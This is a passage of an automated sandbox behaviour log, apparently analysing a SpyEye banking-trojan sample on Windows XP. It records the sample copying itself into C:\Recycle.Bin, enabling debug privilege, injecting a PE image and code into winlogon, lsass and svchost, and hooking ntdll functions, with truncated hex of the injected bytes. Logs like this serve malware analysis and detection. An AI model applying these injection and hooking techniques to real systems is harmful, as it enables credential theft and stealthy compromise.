2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE BAD0000 216FBA8 page execute and read and write success or wait 1 BAE5800
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 650000 216FBD8 page execute and read and write success or wait 1 BAE7FF4
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE BAD0000 216FBA8 page execute and read and write success or wait 1 BAE5800
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 8F0000 216FBD8 page execute and read and write success or wait 1 BAE7FF4
2264 C:\WINDOWS\system32\svchost.exe BAD0000 216FBA8 page execute and read and write success or wait 1 BAE5800
2264 C:\WINDOWS\system32\svchost.exe 9A0000 216FBD8 page execute and read and write success or wait 1 BAE7FF4
1636 C:\WINDOWS\explorer.exe 1F70000 216FA60 page execute and read and write success or wait 1 BAF5387
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
1636 C:\WINDOWS\explorer.exe 7C90CFEE 2000 page execute and read and write page execute and read and write success or wait 2 18205EC
636 C:\WINDOWS\system32\winlogon.exe BAD0000 46000 page execute and read and write page execute and read and write success or wait 3 BAD7627
636 C:\WINDOWS\system32\winlogon.exe 7C90CFEE 2000 page execute and read and write page execute read success or wait 1 BAE2A6F
692 C:\WINDOWS\system32\lsass.exe BAD0000 46000 page execute and read and write page execute and read and write success or wait 3 BAD7627
692 C:\WINDOWS\system32\lsass.exe 7C90CFEE 2000 page execute and read and write page execute read success or wait 1 BAE2A6F
892 C:\WINDOWS\system32\svchost.exe BAD0000 46000 page execute and read and write page execute and read and write success or wait 3 BAD7627
892 C:\WINDOWS\system32\svchost.exe 7C90CFEE 2000 page execute and read and write page execute read success or wait 1 BAE2A6F
968 C:\WINDOWS\system32\svchost.exe BAD0000 46000 page execute and read and write page execute and read and write success or wait 3 BAD7627
968 C:\WINDOWS\system32\svchost.exe 7C90CFEE 2000 page execute and read and write page execute read success or wait 1 BAE2A6F
1052 C:\WINDOWS\system32\svchost.exe BAD0000 46000 page execute and read and write page execute and read and write success or wait 3 BAD7627
1052 C:\WINDOWS\system32\svchost.exe 7C90CFEE 2000 page execute and read and write page execute read success or wait 1 BAE2A6F
1100 C:\WINDOWS\system32\svchost.exe BAD0000 46000 page execute and read and write page execute and read and write success or wait 3 BAD7627
1100 C:\WINDOWS\system32\svchost.exe 7C90CFEE 2000 page execute and read and write page execute read success or wait 1 BAE2A6F
1144 C:\WINDOWS\system32\svchost.exe BAD0000 46000 page execute and read and write page execute and read and write success or wait 3 BAD7627
1144 C:\WINDOWS\system32\svchost.exe 7C90CFEE 2000 page execute and read and write page execute read success or wait 1 BAE2A6F
1496 C:\WINDOWS\system32\spoolsv.exe BAD0000 46000 page execute and read and write page execute and read and write success or wait 3 BAD7627
1496 C:\WINDOWS\system32\spoolsv.exe 7C90CFEE 2000 page execute and read and write page execute read success or wait 1 BAE2A6F
1636 C:\WINDOWS\explorer.exe BB50000 46000 page execute and read and write page execute and read and write success or wait 3 BAD7627
1828 C:\WINDOWS\system32\ctfmon.exe BAD0000 46000 page execute and read and write page execute and read and write success or wait 3 BAD7627
1636 C:\WINDOWS\explorer.exe 7C90D76E 2000 page execute and read and write page execute and write copy success or wait 1 BB695DC
1636 C:\WINDOWS\explorer.exe 7C90D76E 2000 page execute and read and write page execute and read and write success or wait 1 BB72C8B
1636 C:\WINDOWS\explorer.exe BB76E20 2000 page execute and read and write page execute and read and write success or wait 1 BB72C8B
1828 C:\WINDOWS\system32\ctfmon.exe 7C90CFEE 2000 page execute and read and write page execute read success or wait 1 BAE2A6F
1636 C:\WINDOWS\explorer.exe 7C90DF1E 2000 page execute and read and write page execute and read and write success or wait 2 BB695DC
448 C:\WINDOWS\system32\svchost.exe BAD0000 46000 page execute and read and write page execute and read and write success or wait 3 BAD7627
1636 C:\WINDOWS\explorer.exe BB90A90 2000 page execute and read and write page execute and read and write success or wait 1 BB72CA1
1636 C:\WINDOWS\explorer.exe 7C90DC5E 2000 page execute and read and write page execute and read and write success or wait 2 BB695DC
448 C:\WINDOWS\system32\svchost.exe 7C90CFEE 2000 page execute and read and write page execute read success or wait 1 BAE2A6F
508 C:\Program Files\Java\jre6\bin\jqs.exe BAD0000 46000 page execute and read and write page execute and read and write success or wait 3 BAD7627
1636 C:\WINDOWS\explorer.exe BB7F2F8 2000 page execute and read and write page execute and read and write success or wait 1 BB72CB7
1636 C:\WINDOWS\explorer.exe 7C90D2EE 2000 page execute and read and write page execute and read and write success or wait 2 BB695DC
1636 C:\WINDOWS\explorer.exe BB7CF58 2000 page execute and read and write page execute and read and write success or wait 1 BB72CCD
508 C:\Program Files\Java\jre6\bin\jqs.exe 7C90CFEE 2000 page execute and read and write page execute read success or wait 1 BAE2A6F
1636 C:\WINDOWS\explorer.exe 7C90DB3E 2000 page execute and read and write page execute and read and write success or wait 2 BB695DC
1988 C:\WINDOWS\system32\alg.exe BAD0000 46000 page execute and read and write page execute and read and write success or wait 3 BAD7627
1636 C:\WINDOWS\explorer.exe BB90168 2000 page execute and read and write page execute and read and write success or wait 1 BB72D09
1636 C:\WINDOWS\explorer.exe 7E418BF6 2000 page execute and read and write page execute read success or wait 1 BB695DC
1988 C:\WINDOWS\system32\alg.exe 7C90CFEE 2000 page execute and read and write page execute read success or wait 1 BAE2A6F
236 C:\WINDOWS\system32\wscntfy.exe BAD0000 46000 page execute and read and write page execute and read and write success or wait 3 BAD7627
1636 C:\WINDOWS\explorer.exe 7E418BF6 2000 page execute and read and write page execute and read and write success or wait 1 BB6D314
1636 C:\WINDOWS\explorer.exe BB7C210 2000 page execute and read and write page execute and read and write success or wait 1 BB6D314
1636 C:\WINDOWS\explorer.exe 3D949088 2000 page execute and read and write page execute read success or wait 1 BB695DC
236 C:\WINDOWS\system32\wscntfy.exe 7C90CFEE 2000 page execute and read and write page execute read success or wait 1 BAE2A6F
1636 C:\WINDOWS\explorer.exe 3D949088 2000 page execute and read and write page execute and read and write success or wait 1 BB7138F
1636 C:\WINDOWS\explorer.exe BB90D98 2000 page execute and read and write page execute and read and write success or wait 1 BB7138F
1636 C:\WINDOWS\explorer.exe 3D95EE89 2000 page execute and read and write page execute read success or wait 1 BB695DC
724 C:\WINDOWS\system32\msiexec.exe BAD0000 46000 page execute and read and write page execute and read and write success or wait 3 BAD7627
1636 C:\WINDOWS\explorer.exe 3D95EE89 2000 page execute and read and write page execute and read and write success or wait 1 BB713C1
1636 C:\WINDOWS\explorer.exe BB904E8 2000 page execute and read and write page execute and read and write success or wait 1 BB713C1
1636 C:\WINDOWS\explorer.exe 3D94FABE 2000 page execute and read and write page execute read success or wait 1 BB695DC
724 C:\WINDOWS\system32\msiexec.exe 7C90CFEE 2000 page execute and read and write page execute read success or wait 1 BAE2A6F
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe BAD0000 46000 page execute and read and write page execute and read and write success or wait 3 BAD7627
1636 C:\WINDOWS\explorer.exe 3D94FABE 2000 page execute and read and write page execute and read and write success or wait 1 BB713F4
1636 C:\WINDOWS\explorer.exe BB765C8 2000 page execute and read and write page execute and read and write success or wait 1 BB713F4
1636 C:\WINDOWS\explorer.exe 3D9A608E 2000 page execute and read and write page execute read success or wait 1 BB695DC
1636 C:\WINDOWS\explorer.exe 3D9A608E 2000 page execute and read and write page execute and read and write success or wait 1 BB71427
1636 C:\WINDOWS\explorer.exe BB7F660 2000 page execute and read and write page execute and read and write success or wait 1 BB71427
1636 C:\WINDOWS\explorer.exe 71AB4C27 2000 page execute and read and write page execute read success or wait 1 BB695DC
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe 7C90CFEE 2000 page execute and read and write page execute read success or wait 1 BAE2A6F
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE BAD0000 46000 page execute and read and write page execute and read and write success or wait 3 BAD7627
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 7C90CFEE 2000 page execute and read and write page execute read success or wait 1 BAE2A6F
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE BAD0000 46000 page execute and read and write page execute and read and write success or wait 3 BAD7627
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 7C90CFEE 2000 page execute and read and write page execute read success or wait 1 BAE2A6F
2264 C:\WINDOWS\system32\svchost.exe BAD0000 46000 page execute and read and write page execute and read and write success or wait 3 BAD7627
2264 C:\WINDOWS\system32\svchost.exe 7C90CFEE 2000 page execute and read and write page execute read success or wait 1 BAE2A6F
System Activities:
+ System information queried
System info class Completion Count Source Address
HandleInformation info length mismatch 1 BAF16A3
HandleInformation success or wait 1 BAF16A3
ProcessInformation success or wait 1 BAE7E10
BasicInformation success or wait 65 BAD6959
ProcessorInformation success or wait 63 BAD6959
Token Activities:
+ Token privilege adjusted
Status Privilege Completion Count Source Address
on Debug success or wait 3 18100C4
+ Chronological sections
Operation Data Completion Time
Mutant created Name: \BaseNamedObjects\zXeRY3a_PtW|00FFFFFF success or wait 2000465151
Thread created PID: 1636 TID: 2432 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2000469924
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2000471649
Privilege adjusted Privilege: Debug On or off: on success or wait 2000473622
File created Path: C:\Recycle.Bin\ Access: read data or list directory and synchronize Options: directory file and synchronous io non alert and open for backup ident Attributes: normal Content Overwritten: false object name collision 2000474054
File other operation Disposition: BasicInformation Data : 00000000000000000000000000000000000000000000000000000000000000008200000000000000 Path: C:\Recycle.Bin success or wait 2000475779
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read data or list directory and read ea and read attributes and synchronize Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2000476826
File opened Path: C:\Recycle.Bin\ Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false file is a directory 2000478006
File opened Path: C:\Recycle.Bin\ Access: read attributes and synchronize and generic write Options: synchronous io non alert and open for backup ident Attributes: none Content Overwritten: false success or wait 2000478690
File other operation Disposition: BasicInformation Data : 00000000000000000000000000000000000000000000000000000000000000008200000000000000 Path: C:\Recycle.Bin success or wait 2000479871
File opened Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2000481080
File read Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe Offset: none Length: 254976 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 success or wait 2000484886
File created Path: C:\Recycle.Bin\B6232F3AC2C.exe Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2000836335
File write Path: C:\Recycle.Bin\B6232F3AC2C.exe Offset: none Length: 254976 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 success or wait 2002639013
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read data or list directory and read ea and read attributes and synchronize Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2002666352
File opened Path: C:\Recycle.Bin\B6232F3AC2C.exe Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2002667287
File other operation Disposition: BasicInformation Data : 00A013805E3CC601ECCB1BD32FB0CC0180FC04DEB397CB0100000000000000000000000000000000 Path: C:\Recycle.Bin\B6232F3AC2C.exe success or wait 2002668510
Section loaded Path: C:\Recycle.Bin\B6232F3AC2C.exe Access: query and write and read and execute and extend size Type: image Baseaddress: BD0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2002670811
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 2850000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2002688443
Section loaded Path: C:\Recycle.Bin\B6232F3AC2C.exe Access: query and read Type: commit Baseaddress: 2130000 Size: 258048 Protection: readonly Mapped to pid: own pid success or wait 2002699449
Process created PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe Cmdline: C:\Recycle.Bin\B6232F3AC2C.exe Createflags: 0 success or wait 2002705081
File deleted Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe cannot delete 2003372659
Thread delayed Time: 1 TID: 9266 success or wait 2003373527
File deleted Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe cannot delete 2006962607
Thread delayed Time: 1 TID: 9266 success or wait 2006965801
File deleted Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe cannot delete 2010531630
Mutant created Name: \BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 2010532053
Thread created PID: 1636 TID: 1448 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2010533068
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2010533664
Thread delayed Time: 1 TID: 9266 success or wait 2010533905
Thread created PID: 1636 TID: 1076 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2010535117
Thread delayed Time: 0 TID: 4214 success or wait 2010535719
Privilege adjusted Privilege: Debug On or off: on success or wait 2010535804
System info queried Type: HandleInformation info length mismatch 2010536156
System info queried Type: HandleInformation success or wait 2010542539
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 2010547317
Thread created PID: 1636 TID: 932 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2010547893
System info queried Type: ProcessInformation success or wait 2010551115
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: 1FC0000 Size: 16384 Protection: read write Mapped to pid: own pid success or wait 2010553563
Privilege adjusted Privilege: Debug On or off: on success or wait 2010554058
Memory allocated PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: BAD0000 Length: 216FBA8 Allocation Type: null Protection: page execute and read and write success or wait 2010554980
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2010555089
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2010555209
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2010555318
Memory written PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: BAD0000 Length: 286720 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 2014622640
Thread delayed Time: 0 TID: 4214 success or wait 2014624607
File deleted Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe cannot delete 2014625269
Thread delayed Time: 1 TID: 9266 success or wait 2014625574
Memory written PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: BADAFFC Length: 13 Value: B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 2014651475
Memory allocated PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: A30000 Length: 216FBD8 Allocation Type: null Protection: page execute and read and write success or wait 2014651587
System info queried Type: BasicInformation success or wait 2014651715
System info queried Type: ProcessorInformation success or wait 2014651815
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2014651963
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2014652270
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2014652357
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2014652585
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2014652671
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2014652776
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2014652980
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2014653065
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2014653247
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2014653360
System info queried Type: BasicInformation success or wait 2014653653
System info queried Type: ProcessorInformation success or wait 2014653753
Memory written PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: A30000 Length: 4096 Value: 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 2014678545
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2014678672
Memory written PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 7C90CFEE Length: 5 Value: E9 BF 33 12 84 success or wait 2014702293
Memory allocated PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: BAD0000 Length: 216FBA8 Allocation Type: null Protection: page execute and read and write success or wait 2014702889
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2017702998
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2014703120
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2014703230
Memory written PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: BAD0000 Length: 286720 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 2017165071
Thread delayed Time: 0 TID: 4214 success or wait 2017167957
Memory written PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: BADAFFC Length: 13 Value: B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 2017241398
Memory allocated PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 9B0000 Length: 216FBD8 Allocation Type: null Protection: page execute and read and write success or wait 2017272509
System info queried Type: BasicInformation success or wait 2017272842
System info queried Type: ProcessorInformation success or wait 2017273129
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2017277161
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2017278028
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2017278279
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2017278972
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2017279217
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2017279517
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2017280102
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2017280348
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2017280859
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2017281183
System info queried Type: BasicInformation success or wait 2017281989
System info queried Type: ProcessorInformation success or wait 2017282279
Memory written PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 9B0000 Length: 4096 Value: 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 2017297329
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2017300505
Memory written PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 7C90CFEE Length: 5 Value: E9 BF 33 0A 84 success or wait 2017349200
Memory allocated PID: 892 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 216FBA8 Allocation Type: null Protection: page execute and read and write success or wait 2017350674
Memory attributes changed PID: 892 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2017350993
Memory attributes changed PID: 892 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2017351418
Memory attributes changed PID: 892 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2017351737
Memory written PID: 892 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 286720 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 2019260127
Thread delayed Time: 0 TID: 4214 success or wait 2019261989
File deleted Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe cannot delete 2019334255
Thread delayed Time: 1 TID: 9266 success or wait 2019353859
Memory written PID: 892 Path: C:\WINDOWS\system32\svchost.exe Base: BADAFFC Length: 13 Value: B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 2019914781
Memory allocated PID: 892 Path: C:\WINDOWS\system32\svchost.exe Base: EB0000 Length: 216FBD8 Allocation Type: null Protection: page execute and read and write success or wait 2019915508
